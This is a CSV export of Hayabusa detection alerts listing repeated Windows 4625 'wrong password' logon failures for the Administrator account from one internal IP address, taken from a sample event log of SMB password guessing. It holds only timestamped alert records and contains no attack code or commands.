2016-09-20 01:51:56.969 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Wdg3l6IFHTdh09j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.028 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4XLVQRnkUd3bfgvF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rHjqFQwqpCJFI6qP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.139 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L5pEWq2mYsFpFLbb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HSFKJXTC2wlyw0gu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vh5igCJpAA5rmqzV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5NzLlJWkfXDcm64c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i9sR1QHgZ4oaa82F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.340 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pq1GWcKzSHSP28hk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: agCtM0s62zXPop0y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.430 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dVvglj7RtxrBUeXi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.482 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pMbS0sIpbFDqJvMW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ldO0cAZ54BRHHDyz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.577 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OmJH2QWFPiYarKh5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5fCiyHtI0OTo8pBO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.664 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e3vkVuU43tsYHUSj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.714 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3w21sFOu2u7FTDZM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.756 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bk7eaqQNK1CEgqoj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.792 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Rv5joLgkm3QUYPyb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4l15usDM7jggwEyw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.887 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p9QpOvgDmiOgzQqb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.935 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dqyr8tb9TrO1aJNe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.985 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hI1bzjixP8eOdDbw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.032 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pMTAp20wXS3d1OCk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.078 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qrQGfxInmlgPqGtd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZcsMMQbsnUdyLJWi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.224 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8oRYZqBBsq9GyApI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0TAhib6p8fY5iOgI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.306 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FerGHj9abOe6ehZn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.362 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kN4B4KLpXbyKZzGv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HJtoyRfP38T3KToO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rkI5hLApUWhGnKIs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZCPSO4JLjMur2Eow | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VHmrv2xFuq7TyIQN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8SqYq3msNfFh24lg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YE0a2Bypzc1MMdGn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.670 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ojgIg88VK6hB72PI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ehLrf2GoAhY3Rf7Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ccfgpjwpis15B4gY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vysSf3DsOxQf5fVd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IEp88cEeiNw4IQsm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.876 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5PXDJPzw0gPdlCiH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mwoe9IgWx2UZ7Iuu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3eW0nFDUwKFzoQIw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.988 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q0i0p5QxJ4ykYYJt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.033 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VsxqWAnd6j2CdyB3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.090 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y5qdy80mtFWl199k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.121 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ce0d84uBK4t2sqR3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.176 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b4dZYZEW1VijjwHN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZmqGJWbeap5dv0gC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.266 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zaNUqChgVSbDkFQu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.319 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B4PDZ55it0V4QGnM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.370 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TQxXVB8Aj5gaw2f2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vzDeZtgSJoH74GYk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.469 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iNAFsZraFvw67WWR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.533 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0aVdnbyzWqk58rOW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WjUH2PopXCrrPzqi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.616 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ylmV2z3WjTWsTpyu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.654 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8qBKZTYRTKuEAgS8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JvekO4A5f6QK2ynZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.753 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LDUqydSeA1guOjIP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o71TltsJDyOIuLQb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NXT3MSCes42dVCNn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FGXiWeT8Evr6G70M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V2RarzrnGgcLaseH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.968 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u3k7dXu9o1vMkhby | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.009 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EDBt76dmYnPstFWw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.041 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4yjzMC7cw0fe7gjS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eQOWCM7KP68DZTX9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.119 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kn9WWWqCIwfrPbie | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AQcamLSzsXOjP6FL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.278 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6R6ZMRoYkAPB35Bq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.349 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ubqnZm0jmHNFCHrM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.419 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7ORQ8vL1oo6CkJXK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
